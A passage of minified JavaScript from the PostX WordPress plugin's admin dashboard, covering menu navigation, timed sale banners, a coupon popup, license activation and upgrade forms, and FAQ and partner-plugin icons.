Settings","ultimate-post"),c&&o.ZP.refresh))):(0,a.createElement)("div",{className:"skeletonOverflow"},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:150,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:"",unit1:"",size2:34,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:350,unit1:"px",size2:20,unit2:"px",br:2}})))),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:120,unit1:"px",size2:36,unit2:"px",br:2}})))),(0,a.createElement)("div",{className:"ultp-general-settings-content-right"},(0,a.createElement)(i.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"})))}},3546:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(2044);n(8009);const{__}=wp.i18n,o=()=>{const[e,t]=(0,a.useState)(ultp_dashboard_pannel.helloBar);if(new Date>=new Date("2025-06-23")&&(new Date,new Date("2025-07-09")),"hide"===e||ultp_dashboard_pannel.active)return null;const n=[{title:__("Final Hour Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"final_hour_sale",startDate:new Date("2025-08-04"),endDate:new Date("2025-08-14")},{title:__("Massive Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"massive_sale",startDate:new Date("2025-08-18"),endDate:new Date("2025-08-29")},{title:__("Flash Sale is live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"flash_sale",startDate:new Date("2025-09-01"),endDate:new Date("2025-09-17")},{title:__("Exclusive Deals Live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"exclusive_deals",startDate:new Date("2025-09-21"),endDate:new Date("2025-09-30")},{title:__("Booming Black Friday Deals:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 60% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"black_friday_sale",startDate:new Date("2025-11-05"),endDate:new Date("2025-12-10")},{title:__("Fresh New Year Savings:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 55% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"new_year_sale",startDate:new Date("2026-01-01"),endDate:new Date("2026-02-15")}].find((e=>{const t=new Date;return t>=e.startDate&&t<=e.endDate}));let o=0;if(n){const e=new Date;o=Math.floor((n?.endDate-e)/1e3)}return(0,a.createElement)("div",null,n&&(0,a.createElement)("div",{className:"ultp-setting-hellobar"},(0,a.createElement)("span",{className:"dashicons dashicons-bell ultp-ring"}),n.title," ",n.subtitle," ",(0,a.createElement)("strong",null,n.offer)," ",n.product," ",(0,a.createElement)("a",{href:(0,r.Z)({utmKey:n.utmKey,hash:"pricing"}),target:"_blank",rel:"noreferrer"},n.link_text,"   ➤"),(0,a.createElement)("button",{type:"button",className:"helobarClose",onClick:()=>{return e=o,t("hide"),void wp.apiFetch({path:"/ultp/hello_bar",method:"POST",data:{type:"hello_bar",duration:e}});var e},"aria-label":__("Close notification","ultimate-post"),style:{background:"none",border:"none",padding:0,cursor:"pointer"}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 20 20"},(0,a.createElement)("path",{stroke:"currentColor",d:"M15 5 5 15M5 5l10 10"})))))}},1383:(e,t,n)=>{"use strict";n.d(t,{t:()=>_});var a=n(7294),r=n(3935),o=n(3100),i=n(4766),l=n(860),s=n(7191),p=n(8351),c=n(3644),d=(n(9780),n(3944)),u=n(3546),m=(n(2156),n(2470)),f=n(3701),h=n(5957),g=n(3554),v=n(58);const{__}=wp.i18n;function _(){const e=(0,a.useRef)(!1);return(0,a.useEffect)((()=>(e.current=!0,()=>e.current=!1)),[]),e}document.body.contains(document.getElementById("ultp-dashboard"))&&r.render((0,a.createElement)(a.StrictMode,null,(0,a.createElement)((()=>{const[e,t]=(0,a.useState)("xx"),[n,r]=(ultp_dashboard_pannel.status,ultp_dashboard_pannel.expire,(0,a.useState)(!1)),_=[{link:"#home",label:__("Dashboard","ultimate-post"),showin:"both"},{link:"#startersites",label:__("Starter Sites","ultimate-post"),showin:"both",tag:"New"},{link:"#builder",label:__("Site Builder","ultimate-post"),showin:ultp_dashboard_pannel.settings.hasOwnProperty("ultp_builder")&&"false"!=ultp_dashboard_pannel.settings.ultp_builder?"both":"none",showhide:!0},{link:"#blocks",label:__("Blocks","ultimate-post"),showin:"both"},{link:"#addons",label:__("Add-ons","ultimate-post"),showin:"both"},{link:"#settings",label:__("Settings","ultimate-post"),showin:"both"}],w=[{label:__("Get Support","ultimate-post"),icon:"dashicons-phone",link:"https://www.wpxpo.com/contact/?utm_source=postx-menu&utm_medium=all_que-support&utm_campaign=postx-dashboard"},{label:__("Welcome Guide","ultimate-post"),icon:"dashicons-megaphone",link:ultp_dashboard_pannel.setup_wizard_link},{label:__("Join Community","ultimate-post"),icon:"dashicons-facebook-alt",link:"https://www.facebook.com/groups/gutenbergpostx"},{label:__("Feature Request","ultimate-post"),icon:"dashicons-email-alt",link:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=all_que-FR&utm_campaign=postx-dashboard"},{label:__("Youtube Tutorials","ultimate-post"),icon:"dashicons-youtube",link:"https://www.youtube.com/watch?v=_GfXTvSdJTk&list=PLPidnGLSR4qcAwVwIjMo1OVaqXqjUp_s4"},{label:__("Documentation","ultimate-post"),icon:"dashicons-book",link:"https://wpxpo.com/docs/postx/?utm_source=postx-menu&utm_medium=all_que-docs&utm_campaign=postx-dashboard"},{label:__("What’s New","ultimate-post"),icon:"dashicons-edit",link:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=all_que-roadmap&utm_campaign=postx-dashboard"}],b=e=>{if(e.target&&!e.target.classList?.contains("ultp-reserve-button")&&e.target.href&&e.target.href.indexOf("page=ultp-settings#")>0){const n=e.target.href.split("#");n[1]&&(t(n[1]),window.scrollTo({top:0,behavior:"smooth"}))}e.target.closest(".dash-faq-container")||e.target.classList?.contains("ultp-reserve-button")||r(!1)},[x,y]=(0,a.useState)(window.location.hash||e);(0,a.useEffect)((()=>{const e=()=>{y(window.location.hash||"#welcome")};return window.location.hash||(window.location.hash=_[0].link.replace("#","")),window.addEventListener("hashchange",e),()=>{window.removeEventListener("hashchange",e)}}),[]),(0,a.useEffect)((()=>{const n=x.replace("#","");n&&n!==e&&t(n)}),[x,e]),(0,a.useEffect)((()=>((()=>{let e=window.location.href;e.includes("page=ultp-settings#")&&(e=e.split("page=ultp-settings#"),e[1]&&t(e[1]))})(),document.addEventListener("mousedown",b),()=>document.removeEventListener("mousedown",b))),[]);const[k,E]=(0,a.useState)({success:!1,license:"invalid"});return(0,a.createElement)("div",{className:"ultp-menu-items-wrap"},(0,a.createElement)(u.Z,null),(0,a.createElement)("div",{className:"ultp-setting-header"},(0,a.createElement)("div",{className:"ultp-setting-logo"},(0,a.createElement)("img",{className:"ultp-setting-header-img",loading:"lazy",src:ultp_dashboard_pannel.url+"/assets/img/logo-new.png",alt:"PostX"}),(0,a.createElement)("span",{className:"ultp-setting-version"},ultp_dashboard_pannel.version)),(0,a.createElement)("div",{className:"ultp-menu-items",id:"ultp-dashboard-ultp-menu-items"},_.map(((t,n)=>"both"==t.showin||"menu"==t.showin||t.showhide?(0,a.createElement)("a",{href:t.link,style:{display:"none"==t.showin?"none":""},id:"ultp-dasnav-"+t.link.replace("#",""),key:n,className:(t.link=="#"+e?"current":"")+" ultp-menu-item",onClick:()=>y(t.link.replace("#",""))},t.label,t.tag&&(0,a.createElement)("span",{className:"ultp-menu-item-tag"},t.tag)):""))),(0,a.createElement)("div",{className:"ultp-secondary-menu"},(0,a.createElement)("a",{href:"#plugins",className:"ultp-menu-item "+(["plugins","#plugins"].includes(x)?"current":""),onClick:()=>y("plugins")},i.ZP.connect,__("Our Plugins","ultimate-post")),!ultp_dashboard_pannel?.active&&(0,a.createElement)("a",{href:(0,o.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),className:"ultp-secondary-button ultp-pro-button"},__("Upgrade Pro","ultimate-post"),i.ZP.unlock)),(0,a.createElement)("div",{className:"ultp-dash-faq-con"},(0,a.createElement)("span",{onClick:()=>r(!n),className:"ultp-dash-faq-icon ultp-reserve-button dashicons dashicons-editor-help"}),n&&(0,a.createElement)("div",{className:"dash-faq-container"},w.map(((e,t)=>(0,a.createElement)("a",{key:t,href:e.link,target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:`dashicons ${e.icon}`}),e.label)))))),(0,a.createElement)("div",{className:"ultp-settings-container "+("startersites"==e?"ultp-settings-container-startersites":"")},(0,a.createElement)("ul",{className:"ultp-settings-content"},(0,a.createElement)("li",{className:"current"},"xx"!=e&&("home"==e||!["builder","startersites","integrations","saved-templates","custom-font","addons","blocks","settings","tutorials","license","support","plugins"].includes(e))&&(0,a.createElement)(c.Z,null),"saved-templates"==e&&(0,a.createElement)(h.Z,{type:"ultp_templates"}),"custom-font"==e&&(0,a.createElement)(h.Z,{type:"ultp_custom_font"}),"builder"==e&&(0,a.createElement)(p.Z,null),"startersites"==e&&(0,a.createElement)(g.Z,null),"addons"==e&&(0,a.createElement)(l.Z,{integrations:!0}),"blocks"==e&&(0,a.createElement)(s.Z,null),"settings"==e&&(0,a.createElement)(d.Z,null),"license"==e&&(0,a.createElement)(m.C,{licenseData:k,setLicenseData:E}),"support"==e&&(0,a.createElement)(v.Z,null),"plugins"==e&&(0,a.createElement)(f.I,null))),(0,a.createElement)(v.Z,null)),!ultp_dashboard_pannel.active&&(()=>{const e=(new Date).setHours(0,0,0,0)/1e3,t=345600,n=new Date("2024-05-21").setHours(0,0,0,0)/1e3,a=new Date("2024-07-22").setHours(0,0,0,0)/1e3;if(e<n||e>a)return!1;if(ultp_dashboard_pannel.settings.activated_date&&Number(ultp_dashboard_pannel.settings.activated_date)+t>=e)return!1;const r=Number(localStorage.getItem("ultpCouponDiscount"));return r?r<=e&&e<=r+t||e>=r+691200&&(localStorage.setItem("ultpCouponDiscount",String(e)),!0):(localStorage.setItem("ultpCouponDiscount",String(e)),!0)})()&&(0,a.createElement)("a",{className:"ultp-discount-wrap",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-discount&utm_medium=coupon&utm_campaign=postx-dashboard&pux_link=postxdbcoupon#pricing",target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:"ultp-discount-text"},__("Get Discount","ultimate-post"))))}),null)),document.getElementById("ultp-dashboard"))},2470:(e,t,n)=>{"use strict";n.d(t,{C:()=>o});var a=n(7294),r=(n(977),n(356));const{__}=wp.i18n,o=({licenseData:e,setLicenseData:t})=>{const[n,r]=(0,a.useState)(""),[o,l]=(0,a.useState)(!1),[s,p]=(0,a.useState)(!0);return(0,a.useEffect)((()=>{(async()=>{p(!0);const e=await(async()=>{try{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_get_license_data"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw l(!0),new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.success)return a.data}catch(e){return null}})();e?.license_data&&t(e?.license_data),p(!1)})()}),[]),(0,a.useEffect)((()=>{"valid"===e.license?ultp_dashboard_pannel.active=!0:ultp_dashboard_pannel.active=!1}),[e]),(0,a.createElement)("div",{className:"ultp-license"},s?(0,a.createElement)("div",{className:"ultp-license__activation",style:{display:"flex",flexDirection:"column",gap:"16px",paddingTop:"50px !important"}},(0,a.createElement)(c,{width:"250px",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px",style:{marginTop:"10px"}}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"})):(0,a.createElement)(i,{proUpdate:o,licenseKey:n,setLicenseKey:r,licenseData:e,setLicenseData:t}),(0,a.createElement)(u,null))},i=({proUpdate:e,licenseKey:t,setLicenseKey:n,licenseData:o,setLicenseData:i})=>{const[p,c]=(0,a.useState)(!1),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)({state:!1,status:"",messages:[]}),h=async()=>{try{c(!0);const e=await g(t);e?.status&&(i(e?.license_data),window.location.reload()),f({status:e.status?"success":"error",messages:[e?.data||"Some issues occured"],state:!0}),n(""),c(!1),u(!1)}catch(e){u(!0),f({status:"error",messages:["Some issues occured"],state:!0}),console.error("License Activation Error: ",e)}},g=async e=>{const t=`${ultp_dashboard_pannel.ajax}`,n=new URLSearchParams({action:"edd_ultp_activate_license",security:ultp_dashboard_pannel.nonce,license_key:e}),a=await fetch(t,{method:"POST",body:n,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!a.ok)throw new Error(`HTTP error! Status: ${a.status}`);return await a.json()};return(0,a.createElement)("div",{className:"ultp-license__activation"},(0,a.createElement)("div",{className:"ultp-license__title"},__(e?"Notice: Upgrade PostX Pro plugin":"Ready to Use PostX Pro ?","ultimate-post")),m.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:m,setToastMessages:f}),!e&&(0,a.createElement)(a.Fragment,null,"valid"!==o?.license?(0,a.createElement)("div",{className:"ultp-license__form"},(0,a.createElement)("input",{type:"password",id:"ultp-license-key",placeholder:__("Enter Your License Key Here…","ultimate-post"),value:t||"",onChange:e=>n(e.target.value)}),(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("If you’re unable to activate your product license, please contact the","ultimate-post")," ",(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>h(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&h()}},(0,a.createElement)("div",null,__("Activate License","ultimate-post")),p&&(0,a.createElement)("span",{className:"ultp-activate-loading"})),d&&(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("Please make sure your free and pro plugins are updated to the latest release or version. Otherwise, contact the","ultimate-post"),(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post")))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)(l,{title:__("Congratulations on unlocking PostX Pro!","ultimate-post"),message:__("Ignite your imagination and design your ideal experience. Let PostX take care of you and your users.","ultimate-post")}),(0,a.createElement)(s,{licenseData:o,setLicenseData:i,setToastMessages:f}))))},l=({title:e,message:t})=>(0,a.createElement)("div",{className:"ultp-license-message"},(0,a.createElement)("div",{className:"ultp-license-message__icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",width:"48px",height:"46px",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"currentColor"},(0,a.createElement)("path",{d:"M46.15 26.76a.94.94 0 0 0-.39-1.27 14.7 14.7 0 0 0-16.21 1.62l-1.52-1.52 2.48-2.47a.94.94 0 0 0-1.33-1.33l-2.47 2.48-6.04-6.04a13.1 13.1 0 0 0 1.07-13.98.94.94 0 0 0-1.66.88c2.02 3.8 1.7 8.3-.75 11.76l-3.98-3.98a2.3 2.3 0 0 0-3.79.84L.14 44.9c-.3.86-.1 1.78.54 2.42a2.28 2.28 0 0 0 2.42.54l31.15-11.42a2.3 2.3 0 0 0 .84-3.8l-4.2-4.2a12.83 12.83 0 0 1 13.99-1.3.94.94 0 0 0 1.27-.38ZM14.93 41.52l-8.45-8.45 2.34-6.4 12.5 12.5-6.39 2.35Zm-4.58 1.68L4.8 37.65 5.77 35l7.22 7.22-2.64.97Zm-7.9 2.9A.4.4 0 0 1 2 46a.4.4 0 0 1-.1-.45l2.19-5.96 4.32 4.32-5.96 2.19Zm31.43-11.73a.41.41 0 0 1-.27.3l-5.77 2.12-5.33-5.33a.94.94 0 0 0-1.33 1.32l4.72 4.72-2.64.97L9.53 24.74l.97-2.64 4.72 4.72a.93.93 0 0 0 1.32 0 .94.94 0 0 0 0-1.33l-5.33-5.33 2.11-5.77c.07-.19.23-.25.31-.27h.1c.09 0 .2.02.3.12l19.73 19.73c.14.15.13.31.12.4ZM28.27 7.48c.52 0 .94-.42.94-.94 0-.78.64-1.42 1.43-1.42a3.3 3.3 0 0 0 3.3-3.3.94.94 0 0 0-1.88 0c0 .79-.64 1.43-1.42 1.43a3.3 3.3 0 0 0-3.3 3.3c0 .51.42.93.93.93ZM36.6 16.33c1.87 0 3.4-1.53 3.4-3.4 0-.85.69-1.54 1.53-1.54a.94.94 0 0 0 0-1.87 3.41 3.41 0 0 0-3.4 3.4c0 .85-.7 1.54-1.54 1.54a.94.94 0 0 0 0 1.87ZM42 18.14a3 3 0 1 0 6 0 3 3 0 0 0-6 0ZM45 17a1.13 1.13 0 1 1 0 2.26A1.13 1.13 0 0 1 45 17Z"}),(0,a.createElement)("path",{d:"M29.54 15.92a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.12a1.13 1.13 0 1 1 0 2.25 1.13 1.13 0 0 1 0-2.25ZM12 6a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.13a1.13 1.13 0 1 1 0 2.26 1.13 1.13 0 0 1 0-2.25ZM42.42 32.91a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM46.84 37.33a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.33l-.89-.88ZM46.4 32.91l-.88.89a.94.94 0 0 0 1.32 1.32l.89-.88a.94.94 0 0 0-1.33-1.33ZM41.98 37.33l-.88.88a.94.94 0 0 0 1.32 1.33l.89-.88a.94.94 0 0 0-1.33-1.33ZM46.18 2.76c.24 0 .48-.1.66-.28l.89-.88A.94.94 0 1 0 46.4.27l-.88.89a.94.94 0 0 0 .66 1.6ZM41.76 7.18c.24 0 .48-.1.66-.28l.89-.88a.94.94 0 0 0-1.33-1.33l-.88.89a.94.94 0 0 0 .66 1.6ZM46.84 4.7a.94.94 0 0 0-1.32 1.32l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM41.98 2.48a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89A.94.94 0 0 0 41.1 1.6l.88.88ZM18.86 28.2a.94.94 0 0 0-.93.94.94.94 0 0 0 .93.93.94.94 0 0 0 .94-.93.94.94 0 0 0-.94-.94ZM32.54 18.43l-.68.68a.94.94 0 0 0 1.33 1.33l.68-.68a.94.94 0 0 0-1.33-1.33Z"})))),(0,a.createElement)("div",{className:"ultp-license-message__content"},(0,a.createElement)("div",{className:"ultp-license-message__title ultp-license-message-congrats"},e),(0,a.createElement)("div",{className:"ultp-license-message__text"},t))),s=({licenseData:e,setLicenseData:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!1),i=async()=>{try{o(!0);const e=await l();t(e.license_data),n({status:"success",messages:[e?.data||"Some issues occured"],state:!0}),o(!1)}catch(e){n({status:"error",messages:[e.message||"Some issues occured"],state:!0}),o(!1)}},l=async()=>{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_deactivate_license",security:ultp_dashboard_pannel.nonce,deactivate:"yes"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.status)return a};return(0,a.createElement)("div",{className:"ultp-license__status"},(0,a.createElement)("div",{className:"ultp-license__status-messages"},(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("License Type","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.licenseType)),(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("Expire On","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.expiresAt),(e?.toExpired||"expired"===e.license)&&(0,a.createElement)("a",{href:`https://account.wpxpo.com/checkout/?edd_license_key=${ultp_dashboard_pannel.license}&download_id=${e.itemId}&renew=1`,target:"_blank",rel:"noreferrer",className:"ultp-license__renew-link"},(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M2.86 6.553a.5.5 0 01.823-.482l3.02 2.745c.196.178.506.13.64-.098L9.64 4.779a.417.417 0 01.72 0l2.297 3.939a.417.417 0 00.64.098l3.02-2.745a.5.5 0 01.823.482l-1.99 8.63a.833.833 0 01-.813.646H5.663a.833.833 0 01-.812-.646L2.86 6.553z",stroke:"currentColor",strokeWidth:"1.5"})),__("Renew License","ultimate-post"))),(0,a.createElement)(p,{licenseData:e})),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>i(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&i()}},(0,a.createElement)("div",null,__("Deactivate License","ultimate-post")),r&&(0,a.createElement)("span",{className:"ultp-activate-loading"})))},p=({licenseData:e})=>{const[t,n]=(0,a.useState)(""),r={1:__("5 Sites - Yearly","ultimate-post"),2:__("Unlimited Sites - Yearly","ultimate-post"),3:__("1 Site - Lifetime","ultimate-post"),4:__("5 Sites - Lifetime","ultimate-post"),5:__("Unlimited Sites - Lifetime","ultimate-post")},o={1:[1,2,3,4,5],7:[2,3,4,5],2:[4,5],4:[2,4,5],5:[5]}[e?.priceId];return o&&0!==o.length?(0,a.createElement)("div",{className:"ultp-license__upgrade-message"},(0,a.createElement)("div",{className:"ultp-license__upgrade-message-title"},(0,a.createElement)("label",{htmlFor:"ultp-license-select"},__("Choose a upgrade plan","ultimate-post")),(0,a.createElement)("select",{id:"ultp-license-select",value:t,onChange:e=>{n(e.target.value)}},o.map((e=>(0,a.createElement)("option",{key:e,value:e},r[e]))))),(0,a.createElement)("a",{className:"ultp-license__upgrade-link",href:`https://account.wpxpo.com/checkout/?edd_action=sl_license_upgrade&license_key=${ultp_dashboard_pannel.license}&upgrade_id=${t||o[0]}`,target:"_blank",rel:"noreferrer"},__("Upgrade Now","ultimate-post"))):null},c=({width:e="100%",height:t="1rem",borderRadius:n="4px",style:r={}})=>(0,a.createElement)("div",{className:"ultp-custom-skeleton-loader",style:{width:e,height:t,borderRadius:n,...r}}),d=[{question:__("Do I need the free version of the plugin on my site?","ultimate-post"),answer:__("Yes. You can use the free version of the plugin, which includes the free features of PostX. However, please note that to use the pro features, you need the free version of the plugin installed on your WordPress site.","ultimate-post")},{question:__("Where do I get my product license?","ultimate-post"),answer:__("You can copy the product license from the client dashboard. Once you copy it, paste the license key into the PostX License validation page.","ultimate-post")},{question:__("How do I get help to use PostX Pro?","ultimate-post"),hasMarkup:!0,answer:__("Please go to the support link: <a href='https://www.wpxpo.com/contact/.' target='_blank'>www.wpxpo.com/contact</a>","ultimate-post")}],u=()=>(0,a.createElement)("div",{className:"ultp-license__faq"},d.map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-license-faq__item"},(0,a.createElement)("div",{className:"ultp-license-faq__question"},e.question),e.hasMarkup?(0,a.createElement)("div",{className:"ultp-license-faq__answer",dangerouslySetInnerHTML:{__html:e.answer}}):(0,a.createElement)("div",{className:"ultp-license-faq__answer"},e.answer)))),(0,a.createElement)("div",{className:"ultp-license-faq-item"},__("PostX is a product of WPXPO. The contact support team is ready to help you with any queries, including how to use the pro version of PostX.","ultimate-post")))},3701:(e,t,n)=>{"use strict";n.d(t,{I:()=>l});var a=n(7294),r=n(1383);n(7376);const{__}=wp.i18n,o={wholesale_x:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FEAD01",d:"M22.288 5.44498 11.1095 7.77499c-.6634.13829-1.0892.78825-.9509 1.45173l2.33 11.17848c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.66347-.7882-1.08921-1.4517-.95092Zm3.1934 15.32522-11.1785 2.33c-.6635.1383-1.0892.7882-.9509 1.4517l2.33 11.1785c.1383.6635.7882 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7883.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7883-1.0892-1.4517-.9509ZM37.6161 2.25064 26.4377 4.58065c-.6635.1383-1.0893.78826-.951 1.45173l2.33 11.17852c.1383.6634.7883 1.0892 1.4518.9509l11.1784-2.33c.6635-.1383 1.0893-.7883.951-1.4518l-2.33-11.17843c-.1383-.66348-.7883-1.08922-1.4518-.95093Zm3.1934 15.32716-11.1785 2.33c-.6635.1383-1.0892.7883-.9509 1.4517l2.33 11.1785c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7882-1.0892-1.4517-.9509Z"}),(0,a.createElement)("path",{fill:"#6C6CFF",d:"M11.4509 35.4957c-.2235-.0003-.4402-.0776-.6136-.2187-.1734-.1412-.293-.3377-.3386-.5566L4.40205 5.44687c-.0671-.32174-.25914-.60372-.53395-.784-.27481-.18029-.60992-.24415-.93177-.17757-.15961.03288-.31112.09709-.44576.18889-.13464.09181-.24976.20939-.33867.34596-.08986.13594-.15175.2884-.1821.4485-.03036.16011-.02855.32465.00531.48404l.47956 2.30076c.05267.25283.00277.51622-.13875.73225-.14152.21603-.36305.367-.61587.41971-.12518.0261-.25429.02728-.37992.00348-.12564-.0238-.24534-.07212-.352302-.1422-.106958-.07007-.199074-.16054-.271063-.26622-.071988-.10568-.122425-.22451-.14848-.3497L.0686777 6.35002c-.0868909-.41-.0913681-.83319-.0132214-1.24494.0781467-.41176.2373657-.80387.4684307-1.15352.228483-.35063.524233-.65249.870113-.8881.34589-.23562.73506-.40032 1.145-.48457.8274-.1712 1.68888-.00722 2.39554.45595.70665.46317 1.20075 1.18772 1.3739 2.01471L12.4051 34.3231c.0294.1417.0269.2883-.0074.4289s-.0996.2719-.1909.3842c-.0914.1122-.2067.2028-.3374.2649-.1307.0622-.2737.0944-.4185.0944v.0002Zm8.49 5.5912c-.2408-.0005-.4729-.0901-.6515-.2515-.1786-.1615-.291-.3834-.3156-.623-.0245-.2395.0404-.4796.1825-.674.1421-.1944.3511-.3293.5868-.3786l27.0841-5.6452c.2528-.0527.5162-.0028.7322.1387.216.1415.3669.3631.4196.6159.0527.2528.0028.5162-.1387.7322-.1415.216-.363.3669-.6158.4196l-27.0841 5.6452c-.0656.0136-.1325.0205-.1995.0207Z"}),(0,a.createElement)("path",{fill:"#070C1A",d:"M12.8922 45.9671c-.8322-.0016-1.647-.2389-2.3499-.6845-.70286-.4456-1.26512-1.0812-1.62162-1.8332-.35651-.752-.49266-1.5896-.39269-2.4158.09996-.8262.43196-1.6072.95753-2.2525.52558-.6452 1.22318-1.1284 2.01208-1.3935.7889-.2651 1.6367-.3012 2.4453-.1043.8086.197 1.5448.619 2.1234 1.2172.5786.5981.9759 1.348 1.1458 2.1627.2383 1.1434.0126 2.3345-.6273 3.3115-.64.977-1.6418 1.6597-2.7852 1.898-.2984.0625-.6025.0941-.9074.0944Zm.014-6.8621c-.1701 0-.3398.0176-.5062.0525-.4757.099-.9113.3369-1.2518.6835-.3404.3467-.5704.7865-.6609 1.2638-.0905.4774-.0374.9708.1525 1.418.19.4472.5083.828.9147 1.0943.4064.2663.8826.4061 1.3684.4017.4859-.0044.9595-.1527 1.361-.4263.4015-.2735.7129-.66.8948-1.1105.1819-.4505.2261-.9449.127-1.4205-.1152-.5517-.4164-1.047-.8533-1.403-.4368-.3561-.9827-.5512-1.5462-.5528v-.0007Z"})),wow_store:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FF176B",d:"M33.4798 8.9711 48 0l-7.1908 32.9249-4.4393 5.9884H4.9711L0 32.9249l3.90751-17.9654 8.76299 2.9827-2.6127 11.9769h6.289l3.9307-17.9653h9.4335l-3.9307 17.9653h6.2891l4.578-20.948h-3.1676ZM9.98852 48.0005c1.66478 0 2.98268-1.3411 2.98268-2.9827s-1.3411-2.9826-2.98268-2.9826c-1.64162 0-2.98266 1.341-2.98266 2.9826 0 1.6416 1.34104 2.9827 2.98266 2.9827Zm15.67578 0c1.6416 0 2.9827-1.3411 2.9827-2.9827s-1.3411-2.9826-2.9827-2.9826-2.9827 1.341-2.9827 2.9826c0 1.6416 1.3411 2.9827 2.9827 